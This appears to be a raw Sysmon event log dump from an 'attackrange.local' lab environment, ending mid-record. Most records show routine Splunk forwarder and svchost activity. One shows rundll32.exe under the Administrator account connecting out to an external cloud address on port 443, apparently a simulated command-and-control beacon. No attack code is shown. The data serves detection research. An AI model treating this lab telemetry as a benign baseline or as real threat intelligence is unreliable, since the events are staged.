AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62397-false10.0.1.12-8000- 10341000x8000000000000000440250Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:17.144{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440249Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:17.144{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440255Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:18.620{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=743D7DE67E73EFBDF7BAFEC9A4428A88,SHA256=586DDDB3019BB4F8972F64717B59E1C7CF893DA5EEA05874BA985C97729ECAE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291437Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:16.424{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50613-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291436Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:18.631{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69140EB37C1C98E594ED603AE94E7AD9,SHA256=8B95B99854E17B3A4BEDBB207521E4985904F9F2E2600531ACD74B6B3F171209,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291435Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:18.145{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1534D52628E4FD51BB602026DFC7D92F,SHA256=CA71E76396A8832BC6B40ABCA299681A0BB2CBBA478F2094648152F053DD1989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291434Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:18.145{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=963A6F8B93DA918CBE482EADF156D9A5,SHA256=D713703681BFF45F5EC5D6681DD7285D86627A4A452A14FA2B3196AFC060791D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440254Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:18.145{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440253Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:18.145{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440258Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:19.834{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D0C2827C3EFE502701209D3816F6954,SHA256=775A2E6A0877555692FF3023B2C48C42F3061868D2D3DF73ED237A6D7A761719,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291438Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:19.648{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C1AD1305780C9FE017200897BD6E8BF,SHA256=C2C7B1AD35B0FB5D2F9A902F33309E68C4684E1ECE495DEA21E0B47409CA2C51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440257Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:19.146{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440256Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:19.146{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291441Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:20.682{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC8A80F166AEC10878C2DE2E71F30DF1,SHA256=42A4FFAA5BAB27FF70B648594F5FBB45CC53B60EBCB3FCC90C5120919AF09296,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440260Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:20.147{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440259Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:20.147{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291440Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:18.745{BEA10069-187E-6087-4F0E-00000000BB01}3388C:\Windows\SysWOW64\rundll32.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50614-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000291439Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:20.450{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1534D52628E4FD51BB602026DFC7D92F,SHA256=CA71E76396A8832BC6B40ABCA299681A0BB2CBBA478F2094648152F053DD1989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291442Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:21.684{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F4D0D13215360785F872DBFB38C6699,SHA256=55E50717257169D2855E3755076AAE7FD04E01FB6EA8466B6BE39B87BA0AB41E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440264Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:21.962{42DC5269-CF3C-6086-AA00-00000000BA01}4168NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440263Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:21.148{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440262Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:21.148{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440261Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:21.041{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2A2AFC238330A05F7F3A318DCF1A419,SHA256=7F98A22CF9008A8DC99A3F492896566539C2C69991FF145A872A917AD0DB5708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291456Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.686{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=440745F038EA488F263FFB8708C38BD5,SHA256=2C639A0D8C29201C9D03542181A7CE7F5876C973532DD87AC339A003F49918BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440269Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:22.149{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440268Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:22.149{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440267Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:22.118{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EE79291E23D78421C996DE53148DAB7,SHA256=683006CE8C5EA7C9664967AE808FF4968CA3421782556C4F35663A6342F0A927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440266Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:22.117{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=423FA69EC22105D0B61DA9276D09282D,SHA256=4042C49FB3714AA00BDC510B09E2E3B6911F0A693527182290195D549B230F46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440265Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:22.063{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9EDF655F36CFEA54BB83AD32B8B9453,SHA256=E2A4455439B2EC812B3E0614E599D9CB916F8ABB0706F8099C379F4F270C9DBB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291455Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-023A-6088-F529-00000000BB01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291454Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291453Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291452Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291451Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291450Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291449Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291448Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291447Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 